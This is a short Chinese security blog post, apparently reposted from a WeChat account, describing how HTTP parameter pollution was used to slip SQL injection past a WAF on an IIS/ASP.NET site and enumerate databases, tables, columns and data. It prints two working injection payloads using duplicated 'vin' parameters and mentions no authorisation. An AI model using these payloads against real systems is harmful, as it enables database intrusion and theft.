实操:一次简单的HPP绕WAF

admin 2021年10月6日22:17:53评论265 views字数 770阅读2分34秒阅读模式


实操:一次简单的HPP绕WAF


        一次简单的HPP绕WAF


        利用代码中的一段错误,导致我们可以利用hpp来完全绕过防御规则。
        WAF绕过中,对规则与正则的绕过总是有局限性的。


直接操作

单引号报错:


实操:一次简单的HPP绕WAF


                           

闭合一波:


实操:一次简单的HPP绕WAF



直接被干掉……

仔细看了下第一包的响应:asp.net,基本锁定IIS+ASP.NET,此时hpp不香吗


实操:一次简单的HPP绕WAF


结合报错回显,直接构造payload

vin=11111111111111')&vin=and+1=db_name()--+-


实操:一次简单的HPP绕WAF


参数连接时用了逗号,将payload简单修改下:

vin=11111111111111&vin=')+and+1=db_name()--+-


实操:一次简单的HPP绕WAF


也可以直接用注释符包含:


实操:一次简单的HPP绕WAF



依次注出其它库:


实操:一次简单的HPP绕WAF



注表,通过not in语句:


实操:一次简单的HPP绕WAF



利用having 1=1group by注字段:


实操:一次简单的HPP绕WAF

实操:一次简单的HPP绕WAF




注数据:


 

实操:一次简单的HPP绕WAF



        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。


本文始发于微信公众号(Khan安全攻防实验室):实操:一次简单的HPP绕WAF

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月6日22:17:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实操:一次简单的HPP绕WAFhttps://cn-sec.com/archives/400856.html

发表评论

匿名网友 填写信息